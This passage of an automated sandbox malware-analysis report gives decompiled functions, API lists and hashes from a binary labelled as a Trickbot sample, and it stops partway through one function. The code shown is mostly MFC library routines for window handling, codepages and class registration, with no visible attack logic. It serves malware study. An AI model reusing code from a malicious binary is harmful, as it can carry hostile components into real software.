                          Addresses (decompiler address column for the listing above): 0x004226bb, 0x004226c4, 0x004226ef, 0x00000000, 0x004226f5, 0x004226e5, 0x004226ed, 0x00000000, 0x00000000, 0x004226fd

                          APIs
                          • lstrlenA.KERNEL32(?), ref: 004226B5
                          • GetWindowTextA.USER32(?,?,00000100), ref: 004226D1
                          • lstrcmpA.KERNEL32(?,?), ref: 004226E5
                          • SetWindowTextA.USER32(?,?), ref: 004226F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: TextWindow$lstrcmplstrlen
                          • String ID:
                          • API String ID: 330964273-0
                          • Opcode ID: 2be2604f18c3bb89a7eee01f726cce94a27887f8aba2e57b052deb1978e88c82
                          • Instruction ID: aa6bc9a1a3859841b5cb43550d447bac9ac5ad960da4032b922be0b95f0eeaa9
                          • Opcode Fuzzy Hash: 2be2604f18c3bb89a7eee01f726cce94a27887f8aba2e57b052deb1978e88c82
                          • Instruction Fuzzy Hash: 2EF01232500119BBDF226F24ED48ADE7B6DFB18351F009061F856D1164D7F5CE94DB98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042A6AF(void* __ecx, void* __eflags) {
                          				signed int _t9;
                          				int _t10;
                          				void* _t12;
                          				void* _t13;
                          				signed int* _t14;
                          				void* _t15;
                          
                          				_t13 = __ecx;
                          				E0042A6F8(__ecx, __eflags, 1);
                          				ReleaseCapture();
                          				_t12 = E0041884D(_t15, GetDesktopWindow());
                          				LockWindowUpdate(0);
                          				_t9 =  *(_t13 + 0x84);
                          				_t14 = _t13 + 0x84;
                          				if(_t9 != 0) {
                          					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
                          					 *_t14 =  *_t14 & 0x00000000;
                          					return _t10;
                          				}
                          				return _t9;
                          			}

                          Addresses (decompiler address column for the listing above): 0x0042a6b1, 0x0042a6b5, 0x0042a6ba, 0x0042a6ce, 0x0042a6d0, 0x0042a6d6, 0x0042a6dc, 0x0042a6e4, 0x0042a6ec, 0x0042a6f2, 0x00000000, 0x0042a6f2, 0x0042a6f7

                          APIs
                            • Part of subcall function 0042A6F8: GetStockObject.GDI32(00000000), ref: 0042A70E
                            • Part of subcall function 0042A6F8: InflateRect.USER32(?,000000FF,000000FF), ref: 0042A7B2
                          • ReleaseCapture.USER32 ref: 0042A6BA
                          • GetDesktopWindow.USER32 ref: 0042A6C0
                          • LockWindowUpdate.USER32(00000000), ref: 0042A6D0
                          • ReleaseDC.USER32(?,?), ref: 0042A6EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                          • String ID:
                          • API String ID: 1260764132-0
                          • Opcode ID: f8d062d621c3b2e58aabe9b62a6a74432e7db13986ac40fbadfd3b4f6af3446e
                          • Instruction ID: 313dba54ea59d13e929c7d0086f04736438edc0c4968868ba248bd339783b84f
                          • Opcode Fuzzy Hash: f8d062d621c3b2e58aabe9b62a6a74432e7db13986ac40fbadfd3b4f6af3446e
                          • Instruction Fuzzy Hash: FCE01A32600211AFD7112F65EC0DB867AA4EF40321F194439BA46C62A2DFF59CE18B68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E0040664C(void* __ebx, void* __edi) {
                          				char _v17;
                          				signed char _v18;
                          				struct _cpinfo _v24;
                          				char _v280;
                          				char _v536;
                          				char _v792;
                          				char _v1304;
                          				void* _t43;
                          				char _t44;
                          				signed char _t45;
                          				void* _t55;
                          				signed int _t56;
                          				signed char _t64;
                          				intOrPtr* _t66;
                          				signed int _t68;
                          				signed int _t70;
                          				signed int _t71;
                          				signed char _t76;
                          				signed char _t77;
                          				signed char* _t78;
                          				void* _t81;
                          				void* _t87;
                          				void* _t88;
                          
                          				if(GetCPInfo( *0x44d0c0,  &_v24) == 1) {
                          					_t44 = 0;
                          					do {
                          						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                          						_t44 = _t44 + 1;
                          					} while (_t44 < 0x100);
                          					_t45 = _v18;
                          					_v280 = 0x20;
                          					if(_t45 == 0) {
                          						L9:
                          						E0040A6E8(1,  &_v280, 0x100,  &_v1304,  *0x44d0c0,  *0x44d2e4, 0);
                          						E0040973A( *0x44d2e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x44d0c0, 0);
                          						E0040973A( *0x44d2e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x44d0c0, 0);
                          						_t55 = 0;
                          						_t66 =  &_v1304;
                          						do {
                          							_t76 =  *_t66;
                          							if((_t76 & 0x00000001) == 0) {
                          								if((_t76 & 0x00000002) == 0) {
                          									 *(_t55 + 0x44d0e0) =  *(_t55 + 0x44d0e0) & 0x00000000;
                          									goto L16;
                          								}
                          								 *(_t55 + 0x44d1e1) =  *(_t55 + 0x44d1e1) | 0x00000020;
                          								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                          								L12:
                          								 *(_t55 + 0x44d0e0) = _t77;
                          								goto L16;
                          							}
                          							 *(_t55 + 0x44d1e1) =  *(_t55 + 0x44d1e1) | 0x00000010;
                          							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                          							goto L12;
                          							L16:
                          							_t55 = _t55 + 1;
                          							_t66 = _t66 + 2;
                          						} while (_t55 < 0x100);
                          						return _t55;
                          					}
                          					_t78 =  &_v17;
                          					do {
                          						_t68 =  *_t78 & 0x000000ff;
                          						_t56 = _t45 & 0x000000ff;
                          						if(_t56 <= _t68) {
                          							_t81 = _t87 + _t56 - 0x114;
                          							_t70 = _t68 - _t56 + 1;
                          							_t71 = _t70 >> 2;
                          							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                          							_t88 = _t88 + 0x18;
                          						}
                          						_t78 =  &(_t78[2]);
                          						_t45 =  *((intOrPtr*)(_t78 - 1));
                          					} while (_t45 != 0);
                          					goto L9;
                          				}
                          				_t43 = 0;
                          				do {
                          					if(_t43 < 0x41 || _t43 > 0x5a) {
                          						if(_t43 < 0x61 || _t43 > 0x7a) {
                          							 *(_t43 + 0x44d0e0) =  *(_t43 + 0x44d0e0) & 0x00000000;
                          						} else {
                          							 *(_t43 + 0x44d1e1) =  *(_t43 + 0x44d1e1) | 0x00000020;
                          							_t64 = _t43 - 0x20;
                          							goto L22;
                          						}
                          					} else {
                          						 *(_t43 + 0x44d1e1) =  *(_t43 + 0x44d1e1) | 0x00000010;
                          						_t64 = _t43 + 0x20;
                          						L22:
                          						 *(_t43 + 0x44d0e0) = _t64;
                          					}
                          					_t43 = _t43 + 1;
                          				} while (_t43 < 0x100);
                          				return _t43;
                          			}

                          Addresses (decompiler address column for the listing above): 0x00406669, 0x0040666f, 0x00406676, 0x00406676, 0x0040667d, 0x0040667e, 0x00406682, 0x00406685, 0x0040668e, 0x004066c7, 0x004066e6, 0x0040670a, 0x00406732, 0x0040673a, 0x0040673c, 0x00406742, 0x00406742, 0x00406748, 0x00406763, 0x00406775, 0x00000000, 0x00406775, 0x00406765, 0x0040676c, 0x00406758, 0x00406758, 0x00000000, 0x00406758, 0x0040674a, 0x00406751, 0x00000000, 0x0040677c, 0x0040677c, 0x0040677e, 0x0040677f, 0x00000000, 0x00406742, 0x00406692, 0x00406695, 0x00406695, 0x00406698, 0x0040669d, 0x004066a1, 0x004066a8, 0x004066b0, 0x004066ba, 0x004066ba, 0x004066ba, 0x004066bd, 0x004066be, 0x004066c1, 0x00000000, 0x004066c6, 0x00406785, 0x0040678c, 0x0040678f, 0x004067ad, 0x004067c2, 0x004067b4, 0x004067b4, 0x004067bd, 0x00000000, 0x004067bd, 0x00406796, 0x00406796, 0x0040679f, 0x004067a2, 0x004067a2, 0x004067a2, 0x004067c9, 0x004067ca, 0x004067d0

                          APIs
                          • GetCPInfo.KERNEL32(?,00000000), ref: 00406660
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Info
                          • String ID: $
                          • API String ID: 1807457897-3032137957
                          • Opcode ID: 234537e40e8c7f6d650b8213b560fcc1438766d722cb852057b4b7f24adbd163
                          • Instruction ID: cce97f6c58ef28f5b0d2c612c65484979d77b96c8f0766b4ea0f5c7029295a4d
                          • Opcode Fuzzy Hash: 234537e40e8c7f6d650b8213b560fcc1438766d722cb852057b4b7f24adbd163
                          • Instruction Fuzzy Hash: AE41AC315002581EFB16C724CD49BFB3FA9AB02708F1504FAD587E71D3C2794A69CB6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00402610(void* __ecx) {
                          				void* __ebp;
                          				void* _t57;
                          				void* _t58;
                          				void* _t73;
                          				void* _t74;
                          				intOrPtr _t84;
                          				intOrPtr _t104;
                          				intOrPtr _t109;
                          				intOrPtr _t112;
                          				intOrPtr* _t114;
                          				void* _t116;
                          				intOrPtr _t120;
                          				void* _t121;
                          				void* _t122;
                          
                          				_push(0xffffffff);
                          				_push(E00437468);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t120;
                          				_t121 = _t120 - 0x4c;
                          				_push(_t116);
                          				_t112 =  *((intOrPtr*)(__ecx + 0x3c));
                          				_t3 = _t112 + 0x20; // 0x20
                          				E00417C3D(_t121 + 0x10, _t3);
                          				 *((intOrPtr*)(_t121 + 0x68)) = 0;
                          				E00417C3D(_t121 + 0x18, _t112 + 0x1c);
                          				 *((char*)(_t121 + 0x64)) = 1;
                          				if( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x10)) - 8)) > 0x4b) {
                          					L2:
                          					E00417FB5(_t121 + 0x10, _t116, _t121 + 0x18);
                          				} else {
                          					_t74 = E0040504F( *((intOrPtr*)(_t121 + 0x18)), "Untitled");
                          					_t121 = _t121 + 8;
                          					_t125 = _t74;
                          					if(_t74 == 0) {
                          						goto L2;
                          					}
                          				}
                          				_t84 =  *0x447478; // 0x44748c
                          				 *((intOrPtr*)(_t121 + 0x14)) = _t84;
                          				_t109 =  *((intOrPtr*)(_t121 + 0x70));
                          				 *((char*)(_t121 + 0x64)) = 2;
                          				E004155CC(_t121 + 0x14, "%d",  *((intOrPtr*)(_t109 + 0x14)));
                          				_t122 = _t121 + 0xc;
                          				_t57 = E004180D0(_t122 + 0x10);
                          				 *((char*)(_t122 + 0x70)) = 3;
                          				_t58 = E0041806A(_t122 + 0x14, _t125);
                          				 *((char*)(_t122 + 0x68)) = 4;
                          				E00417FB5(_t122 + 0x14, _t116, _t58);
                          				 *((char*)(_t122 + 0x64)) = 3;
                          				E00417EC8(_t122 + 0x70);
                          				 *((char*)(_t122 + 0x64)) = 2;
                          				E00417EC8(_t122 + 0x1c);
                          				_t114 =  *((intOrPtr*)(_t122 + 0x6c));
                          				E004213CD(_t114, 0);
                          				_t104 =  *((intOrPtr*)(_t122 + 0x10));
                          				 *((intOrPtr*)( *_t114 + 0x5c))( *((intOrPtr*)(_t109 + 0x24)),  *((intOrPtr*)(_t109 + 0x30)) + 0x64, _t104,  *((intOrPtr*)(_t104 - 8)), _t122 + 0x70, _t57, _t122 + 0x14, _t122 + 0x1c, _t122 + 0x10, "    ");
                          				GetTextMetricsA( *(_t114 + 8), _t122 + 0x24);
                          				_t40 =  *(_t122 + 0x24) + 0x5a; // 0x4025d9
                          				E0042134C(_t114, _t122 + 0x1c, 0,  *((intOrPtr*)(_t109 + 0x30)) + _t40);
                          				E00421398(_t114,  *((intOrPtr*)(_t109 + 0x2c)),  *((intOrPtr*)(_t109 + 0x30)) + _t40);
                          				 *((char*)(_t122 + 0x64)) = 1;
                          				E00417EC8(_t122 + 0x14);
                          				 *((char*)(_t122 + 0x64)) = 0;
                          				E00417EC8(_t122 + 0x18);
                          				 *((intOrPtr*)(_t122 + 0x64)) = 0xffffffff;
                          				_t73 = E00417EC8(_t122 + 0x10);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t122 + 0x5c));
                          				return _t73;
                          			}

                          Addresses (decompiler address column for the listing above): 0x00402610, 0x00402612, 0x0040261d, 0x0040261e, 0x00402625, 0x00402629, 0x0040262b, 0x00402633, 0x00402637, 0x00402644, 0x0040264c, 0x00402655, 0x0040265e, 0x00402676, 0x0040267f, 0x00402660, 0x0040266a, 0x0040266f, 0x00402672, 0x00402674, 0x00000000, 0x00000000, 0x00402674, 0x00402684, 0x0040268a, 0x0040268e, 0x00402696, 0x004026a5, 0x004026aa, 0x004026bc, 0x004026ce, 0x004026d2, 0x004026dc, 0x004026e1, 0x004026ea, 0x004026ee, 0x004026f7, 0x004026fc, 0x00402701, 0x00402709, 0x0040270e, 0x00402726, 0x00402732, 0x00402743, 0x0040274d, 0x00402759, 0x00402762, 0x00402767, 0x00402770, 0x00402775, 0x0040277a, 0x00402786, 0x00402793, 0x0040279d

                          APIs
                            • Part of subcall function 00417C3D: InterlockedIncrement.KERNEL32(?), ref: 00417C52
                          • GetTextMetricsA.GDI32(0000004B,?), ref: 00402732
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: IncrementInterlockedMetricsText
                          • String ID: $Untitled
                          • API String ID: 4071161107-2281449210
                          • Opcode ID: 254ef68af47bc20d8db6d50f92720e6cd91167b45bdce03409c3e04895833b4d
                          • Instruction ID: fa5c8c615eaa47b1283962e76aa9b7a5492b5ef7f108aa91d830c6c1765fc583
                          • Opcode Fuzzy Hash: 254ef68af47bc20d8db6d50f92720e6cd91167b45bdce03409c3e04895833b4d
                          • Instruction Fuzzy Hash: F8417DB51087469FD204EF24D981AAFB7E8BB98708F00094DF49153391DB78E949CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00427EA1(void* __ecx, char _a4, intOrPtr _a8, void* _a12, intOrPtr _a24, intOrPtr _a28) {
                          				signed int _v8;
                          				char _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				struct tagRECT _v36;
                          				signed int _t50;
                          				intOrPtr _t57;
                          				void* _t72;
                          				signed int _t73;
                          				signed int _t77;
                          				void* _t81;
                          				intOrPtr _t87;
                          				intOrPtr _t92;
                          				void* _t94;
                          				intOrPtr* _t95;
                          				void* _t96;
                          				void* _t97;
                          				void* _t105;
                          
                          				_t96 = __ecx;
                          				_t50 = 0;
                          				_v16 = 0;
                          				_v12 = 0;
                          				_t77 =  *(__ecx + 0x64) & 0x0000a000;
                          				_v20 = 0;
                          				_v8 = 0;
                          				if( *((intOrPtr*)(__ecx + 0x84)) <= 0) {
                          					L21:
                          					_t97 = _t96 + 0x7c;
                          					_t94 = _v16 + 1;
                          					E00416B74(_t97, _t94, _t50, 1);
                          					_push(1);
                          					_t81 = _t97;
                          					_t42 =  &_a4; // 0x42740d
                          					_push( *_t42);
                          					_push(_t94);
                          					L22:
                          					E00416B74(_t81);
                          					return _t94;
                          				} else {
                          					goto L1;
                          				}
                          				do {
                          					L1:
                          					_t95 = E00427E85(_t96, _v8);
                          					if(_t95 == 0 ||  *((intOrPtr*)( *_t95 + 0xc8))() == 0) {
                          						_t27 =  &_v12; // 0x42740d
                          						_v12 = 0;
                          						_v20 = _v20 +  *_t27 -  *0x44b30c;
                          						_t57 = _a28;
                          						if(_t77 == 0) {
                          							_t57 = _a24;
                          						}
                          						if(_t57 < _v20) {
                          							if(_v8 == 0) {
                          								E00416B74(_t96 + 0x7c, _v16 + 1, 0, 1);
                          							}
                          							_push(1);
                          							_t47 =  &_a4; // 0x42740d
                          							_push( *_t47);
                          							_t81 = _t96 + 0x7c;
                          							_t94 = _v16 + 1;
                          							_push(_t94);
                          							goto L22;
                          						} else {
                          							goto L18;
                          						}
                          					} else {
                          						GetWindowRect( *(_t95 + 0x1c),  &_v36);
                          						E0042147E(_t96,  &_v36);
                          						_t87 = _v36.right;
                          						_t92 = _v36.bottom;
                          						if(_t77 == 0) {
                          							_t72 = _t87 - _v36.left - 1;
                          						} else {
                          							_t72 = _t92 - _v36.top;
                          						}
                          						if(_v12 <= _t72) {
                          							if(_t77 == 0) {
                          								_v12 = _t87 - _v36.left - 1;
                          							} else {
                          								_v12 = _t92 - _v36.top;
                          							}
                          						}
                          						if(_t77 == 0) {
                          							_t73 = 0;
                          						} else {
                          							_t73 = 0;
                          							_t105 = _a8 - _v36.left;
                          						}
                          						if((_t73 & 0xffffff00 | _t105 > 0x00000000) != 0) {
                          							L18:
                          							_v16 = _v8;
                          						}
                          					}
                          					_v8 = _v8 + 1;
                          				} while (_v8 <  *((intOrPtr*)(_t96 + 0x84)));
                          				_t50 = 0;
                          				goto L21;
                          			}

                          Addresses (decompiler address column for the listing above): 0x00427ea9, 0x00427eab, 0x00427eae, 0x00427eb4, 0x00427eb7, 0x00427ec3, 0x00427ec6, 0x00427ec9, 0x00427f8d, 0x00427f90, 0x00427f96, 0x00427f9c, 0x00427fa1, 0x00427fa3, 0x00427fa5, 0x00427fa5, 0x00427fa8, 0x00427fa9, 0x00427fa9, 0x00427fb4, 0x00000000, 0x00000000, 0x00000000, 0x00427ecf, 0x00427ecf, 0x00427ed9, 0x00427edd, 0x00427f53, 0x00427f5e, 0x00427f61, 0x00427f64, 0x00427f69, 0x00427f6b, 0x00427f6b, 0x00427f71, 0x00427fba, 0x00427fc7, 0x00427fc7, 0x00427fcf, 0x00427fd1, 0x00427fd1, 0x00427fd4, 0x00427fd7, 0x00427fda, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00427eed, 0x00427ef4, 0x00427f00, 0x00427f05, 0x00427f08, 0x00427f0d, 0x00427f1b, 0x00427f0f, 0x00427f11, 0x00427f11, 0x00427f1f, 0x00427f23, 0x00427f31, 0x00427f25, 0x00427f28, 0x00427f28, 0x00427f23, 0x00427f36, 0x00427f45, 0x00427f38, 0x00427f3b, 0x00427f3d, 0x00427f3d, 0x00427f4f, 0x00427f73, 0x00427f76, 0x00427f76, 0x00427f4f, 0x00427f79, 0x00427f7f, 0x00427f8b, 0x00000000

                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00427EF4
                            • Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A23B), ref: 00421492
                            • Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A243), ref: 0042149B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClientScreen$RectWindow
                          • String ID: tB$tB
                          • API String ID: 3716460499-3123891508
                          • Opcode ID: e83846ccdf2ccebab0f6702397245aaac5644ebd5c648e059ecc240c08b72810
                          • Instruction ID: 4658d22d4b11067f9b37a5e1a19cb904597ddf9d6b50cee2d977d970705649a9
                          • Opcode Fuzzy Hash: e83846ccdf2ccebab0f6702397245aaac5644ebd5c648e059ecc240c08b72810
                          • Instruction Fuzzy Hash: 02416E31B0822AEFCF14DFA4D9809AEB7B5FF48304F51816AE515E7240DB78EA41CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
			// Layout of MFC's AfxRegisterWndClass (statically linked library code, not sample-specific
			// logic): the class name is "Afx:%x:%x" (hInstance, style) or, when a cursor, background
			// brush or icon is given, "Afx:%x:%x:%x:%x:%x"; if GetClassInfoA finds no such class it is
			// registered with DefWindowProcA as window procedure. The trailing comment on each statement
			// is the instruction address the report associates with it.
			E00419462(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E0043316A(1);                                                              // 0x00419464
				E00405861(0, 0);                                                           // 0x0041946d
				_push(0);                                                                  // 0x00419478
				// per-module/thread scratch buffer that receives the class name
				_t50 = E00432335() + 0x58;                                                 // 0x00419482
				_t27 = E00432562();                                                        // 0x00419485
				_t40 = _a8;                                                                // 0x0041948a
				_t46 =  *(_t27 + 8);                                                       // 0x0041948d
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {                            // 0x00419492
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);    // 0x004194c4
				} else {                                                                   // 0x0041949e
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);                               // 0x004194a8
				}                                                                          // 0x004194ae
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {                               // 0x004194db
					_v44.style = _a4;                                                      // 0x004194e3
					_v44.lpfnWndProc = DefWindowProcA;                                     // 0x004194eb
					_v44.cbWndExtra = 0;                                                   // 0x004194f0
					_v44.cbClsExtra = 0;                                                   // 0x004194f3
					_v44.lpszMenuName = 0;                                                 // 0x004194f6
					_v44.hIcon = _a16;                                                     // 0x004194f9
					_t44 = _a12;                                                           // 0x004194fc
					_push( &_v44);                                                         // 0x00419502
					_v44.hInstance = _t46;                                                 // 0x00419503
					_v44.hCursor = _t40;                                                   // 0x00419506
					_v44.hbrBackground = _a12;                                             // 0x00419509
					_v44.lpszClassName = _t50;                                             // 0x0041950c
					// register the class; on failure the callee at 0x00421855 raises an exception
					if(E004193D1() == 0) {                                                 // 0x00419516
						E00421855(_t44);                                                   // 0x00419518
					}                                                                      // 0x00419518
				}                                                                          // 0x00419516
				return _t50;                                                               // 0x00419523
			}

                          APIs
                            • Part of subcall function 0043316A: LeaveCriticalSection.KERNEL32(?,00432E1B,00000010,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011,0041E91C), ref: 00433182
                            • Part of subcall function 00405861: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0040588F
                          • wsprintfA.USER32 ref: 004194A8
                          • wsprintfA.USER32 ref: 004194C4
                          • GetClassInfoA.USER32(?,-00000058,?), ref: 004194D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
                          • String ID: Afx:%x:%x
                          • API String ID: 2529146597-2071556601
                          • Opcode ID: cbccef900036fa227f4702b24e974e0869e4a31dd4400d24074d147dc7009176
                          • Instruction ID: 0d9d3c4c15e9cd7e8cd16735e69a16ae042555e899a34f3f0b1d9621fb0b9e59
                          • Opcode Fuzzy Hash: cbccef900036fa227f4702b24e974e0869e4a31dd4400d24074d147dc7009176
                          • Instruction Fuzzy Hash: 55112171A00209AF8F10EFA6D9819DF7BB8EF58754F00402BE905E2201D7789E41CBA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
			// Static-object teardown routine: rewrites vtable pointers of the global object at 0x44bcd8,
			// sets up an SEH frame (E00405340 is __EH_prolog, see the APIs list of E004100D8 below),
			// decrements a byte reference counter in the table at 0x44bf14 and calls E0040FD0F once
			// it reaches zero. E0040ED04 below is the same routine for the object at 0x44bd18; the
			// report lists an identical address column for both. Trailing comments give the
			// instruction address the report associates with each statement.
			E0040ECD5() {
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t28;
				void* _t30;

				 *((intOrPtr*)( *((intOrPtr*)( *0x44bcd8 + 4)) + 0x44bcd4)) = 0x43ec40;        // 0x0040eca3
				 *0x44bcd8 = 0x43ec48;                                                          // 0x0040efe5
				E00405340(E00438E23, _t30);                                                     // 0x0040fc00
				_push(0x44bcd8);                                                                // 0x0040fc05
				_t28 = 0x44bcdc;                                                                // 0x0040fc07
				 *((intOrPtr*)(_t30 - 0x10)) = 0x44bcdc;                                        // 0x0040fc09
				 *((intOrPtr*)(0x44bcdc)) = 0x43ed34;                                           // 0x0040fc0c
				_t18 =  *0x0044BD00;                                                            // 0x0040fc12
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;                                       // 0x0040fc15
				if(_t18 <= 0) {                                                                 // 0x0040fc1b
					L5:                                                                         // 0x0040fc2f
					E0040FD0F(_t28);                                                            // 0x0040fc31
				} else {                                                                        // 0x0040fc1d
					 *((char*)(_t18 + 0x44bf14)) =  *((char*)(_t18 + 0x44bf14)) - 1;            // 0x0040fc1d
					if( *((char*)( *((intOrPtr*)(0x44bd00)) + 0x44bf14)) <= 0) {                // 0x0040fc2d
						goto L5;                                                                // 0x00000000
					}                                                                           // 0x00000000
				}                                                                               // 0x0040fc2d
				_t20 = E0040DFC2(_t28 + 0x20);                                                  // 0x0040fc39
				// restore the previous SEH handler saved by __EH_prolog
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));                                       // 0x0040fc42
				return _t20;                                                                    // 0x0040fc4a
			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: @C$LC
                          • API String ID: 3519838083-3536014141
                          • Opcode ID: 030e052b1ab28efde695e42aa561c7ad37c9b07f75ec40106a909869b751091b
                          • Instruction ID: d8b5cb53c324347aa0ee5628501bb8d79d73d7d37aa443073f3dc6a254affe88
                          • Opcode Fuzzy Hash: 030e052b1ab28efde695e42aa561c7ad37c9b07f75ec40106a909869b751091b
                          • Instruction Fuzzy Hash: 70F0A9706046408BE324DF19C545A69BBE0FB08308F1488BFE443AB781D7B8A909CF4E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
			// Same teardown routine as E0040ECD5 above, operating on the global object at 0x44bd18
			// (counter index taken from 0x44bd40). The report gives it the same address column as
			// E0040ECD5; the addresses are reproduced as trailing comments.
			E0040ED04() {
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t28;
				void* _t30;

				 *((intOrPtr*)( *((intOrPtr*)( *0x44bd18 + 4)) + 0x44bd14)) = 0x43ec40;        // 0x0040eca3
				 *0x44bd18 = 0x43ec48;                                                          // 0x0040efe5
				E00405340(E00438E23, _t30);                                                     // 0x0040fc00
				_push(0x44bd18);                                                                // 0x0040fc05
				_t28 = 0x44bd1c;                                                                // 0x0040fc07
				 *((intOrPtr*)(_t30 - 0x10)) = 0x44bd1c;                                        // 0x0040fc09
				 *((intOrPtr*)(0x44bd1c)) = 0x43ed34;                                           // 0x0040fc0c
